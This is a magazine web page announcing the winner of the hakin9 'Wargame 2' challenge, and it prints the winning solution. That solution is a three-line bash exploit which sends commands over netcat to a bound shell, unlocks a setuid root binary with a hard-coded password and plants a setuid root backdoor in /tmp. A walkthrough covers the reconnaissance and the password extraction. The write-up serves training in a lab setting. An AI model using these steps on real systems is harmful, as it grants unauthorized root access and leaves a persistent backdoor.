pl   en   cz   es   fr   de   it  

Software-Conferences DistroRankings About


E-mail:
SERVERAREA.COM Domains Hosting Servers                                                  

hakin9 wargame 2 results revealed!!!


The winner of Wargame 2 is Tynan Wilke. He provided
very complete solution pointing out various possibilities of exploiting the vulnerable program.
Congrats!!!!
Here is the winnig solution:

---The Exploit----------------
#!/bin/bash
printf "/home/admin/.beroot crtf4a9scem3132jnidnwhoamincp
/home/admin/.beroot /tmp/.backdoornchown root /tmp/.backdoornchmod
4755 /tmp/.backdoorn" | nc localhost 4567
/tmp/.backdoor crtf4a9scem3132j
-------------------------------

I doubt this is the most stylish and unique approach, but it works.

After loading up the image and logging in for the first time, initial
reconnaissance was performed, such as finding the kernel version,
running processes, listening ports, and users on the host.

The following commands were performed (corresponding output not included
due to inconvenience):
$ uname -a
$ cat /etc/passwd
$ netstat -an
$ ps auxw

The "ps auxw" output showed a running netcat process under the user
"admin" which was bound to port 4567 and upon connection would spawn a
bash shell.

I initially used telnet to connect to this service and see where it led.
$ telnet localhost 4567

And now confirmed I was user "admin".
id
uid=501(admin) gid=501(admin)
whoami
admin

Then, browsed to admin's home directory to see what documents or
executable could be used to escalate privileges all the way to root.
ls -la ~/
-rwsr-sr-- 1 root admin 6712 Fed 12 20:57 .beroot

Alas! A suid root shell! Running this file showed that it takes only one
argument: a password. Looking for low-hanging fruit, I ran a strings
query on the executable to see if there was possibly a hard-coded
password within the file.
strings .beroot
...
crtf4a9scem3132j
...

As luck would have it, this was the hard-coded password I was looking for.
./.beroot crtf4a9scem3132j
id
uid=0(root) gid=501(admin)
whoami
root

Now it was just a matter of coding all of these steps up into a very
small (3 lines) bash script to automate this exploit process, and have
an end-result of a root shell available to the hakin9 user.
Contact us
Send us your questions
Want to buy the magazine?
Contact me!


Search